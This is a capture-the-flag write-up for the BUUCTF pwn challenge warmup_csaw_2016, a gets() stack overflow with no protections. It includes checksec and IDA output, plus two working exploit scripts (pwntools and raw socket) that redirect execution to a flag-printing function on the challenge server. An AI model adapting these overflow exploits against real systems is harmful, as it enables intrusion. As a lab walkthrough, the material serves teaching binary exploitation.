BUUCTF-PWN pitfall notes 03: warmup_csaw_2016
warmup_csaw_2016
- 1.file
root@kali:~/Downloads# file warmup_csaw_2016
warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped
A 64-bit, dynamically linked, stripped ELF.
- 2.checksec
root@kali:~/Downloads# checksec warmup_csaw_2016
[*] '/root/Downloads/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
Effectively no protections: no stack canary, NX disabled and no PIE (only partial RELRO). Code addresses are fixed, and nothing stops us from overwriting the return address.
- 3.IDA
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-80h]
char v5; // [rsp+40h] [rbp-40h]
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(&s, "%p\n", sub_40060D);
write(1, &s, 9uLL);
write(1, ">", 1uLL);
return gets(&v5, ">");
}
The second argument IDA shows for gets() is a decompiler artifact; gets() takes only the destination pointer. What matters is that gets() has no length limit, so input longer than the 0x40-byte buffer v5 (at rbp-0x40) runs over the saved rbp and then main's return address.
Run result
root@kali:~/Downloads# ./warmup_csaw_2016
-Warm Up-
WOW:0x40060d
>12
Looking at sub_40060D
int sub_40060D()
{
return system("cat flag.txt");
}
This is the target: it simply runs system("cat flag.txt"), so overwriting main's return address with 0x40060d is enough; no shellcode or ROP chain is needed. The padding is 0x40 bytes to fill v5, 8 more bytes for the saved rbp, then the address.
Building the exploit
#!/usr/bin/python3
#coding=utf-8
from pwn import *
port = 25397
p = remote('node3.buuoj.cn',port)
# 0x40 bytes fill v5 (rbp-0x40), 8 bytes clobber the saved rbp,
# then the return address is replaced with sub_40060D (cat flag.txt)
payload = b'a'*0x40 + b'b'*8 + p64(0x40060d)
p.sendline(payload)   # gets() reads up to the newline sendline appends
p.interactive()
Exploit output
root@kali:~/Downloads# python3 exp_warmup_csaw_2016.py
[+] Opening connection to node3.buuoj.cn on port 25397: Done
[*] Switching to interactive mode
-Warm Up-
WOW:0x40060d
>flag{7fe33307-500a-42af-a7a6-b9a039f20b8f}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$
The core dump after the flag is expected: once system("cat flag.txt") returns, sub_40060D executes ret and pops the 8 bytes that follow our fake return address on the stack (a NUL terminator from gets() plus leftover stack data), so the process jumps to an invalid address and crashes. By then the flag has already been printed, so it does not matter here.
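As an added example (not from the original writeup, and not using pwntools), the same exploit written against the standard library: it derives the padding from the `[rbp-40h]` annotation in the IDA listing instead of hard-coding it, parses the address that main() leaks after `WOW:` (falling back to the static 0x40060d, since the binary is not PIE), and refuses any payload that would contain a 0x0a byte, because gets() stops reading there. The host and port in the `__main__` block are taken from the writeup but are assumed to be live; BUUCTF instances change.

```python
import re
import socket
import struct

# From the page's IDA/checksec output: no PIE, so sub_40060D
# (system("cat flag.txt")) is always at 0x40060d.
SUB_40060D = 0x40060D
SAVED_RBP_SIZE = 8  # x86-64: saved rbp sits between the buffer and the return address


def p64(value):
    """Little-endian 64-bit pack, the same thing pwntools' p64() does."""
    return struct.pack("<Q", value)


def offset_from_ida(decl):
    """Padding needed to reach the return address, given an IDA local-variable
    line such as 'char v5; // [rsp+40h] [rbp-40h]'.
    The [rbp-XXh] value is the buffer's distance below the saved rbp."""
    m = re.search(r"\[rbp-([0-9A-Fa-f]+)h\]", decl)
    if m is None:
        raise ValueError("no [rbp-XXh] annotation in: " + decl)
    return int(m.group(1), 16) + SAVED_RBP_SIZE


def parse_leak(banner):
    """Pull the pointer that main() prints with sprintf("%p") after 'WOW:'."""
    m = re.search(rb"WOW:(0x[0-9a-fA-F]+)", banner)
    return int(m.group(1), 16) if m else None


def build_payload(target, offset):
    """Fill the buffer and saved rbp, then overwrite the return address."""
    payload = b"a" * (offset - SAVED_RBP_SIZE)  # fill the local buffer
    payload += b"b" * SAVED_RBP_SIZE            # saved rbp, value irrelevant
    payload += p64(target)                      # new return address
    # gets() stops at '\n' (0x0a): a target containing that byte would be
    # truncated, so refuse it rather than send a broken payload.
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would truncate it")
    return payload


def exploit(host, port, ida_line="char v5; // [rsp+40h] [rbp-40h]"):
    """Connect, use the leaked address (or the static one), send the
    overflow and return whatever the service prints afterwards."""
    offset = offset_from_ida(ida_line)
    with socket.create_connection((host, port), timeout=5) as s:
        banner = b""
        while not banner.endswith(b">"):  # read up to the input prompt
            chunk = s.recv(4096)
            if not chunk:
                break
            banner += chunk
        target = parse_leak(banner) or SUB_40060D
        s.sendall(build_payload(target, offset) + b"\n")
        out = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                out += chunk
        except socket.timeout:
            pass
        return out


if __name__ == "__main__":
    # Host/port from the writeup; assumed to be a live instance.
    print(exploit("node3.buuoj.cn", 25397).decode(errors="replace"))
```

The 0x0a check matters more than it looks: 0x40060d happens to be safe, but a target such as 0x40060a would be cut off by gets() and the overwrite would silently fail.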
The above is my own approach to this challenge; discussion and feedback are welcome.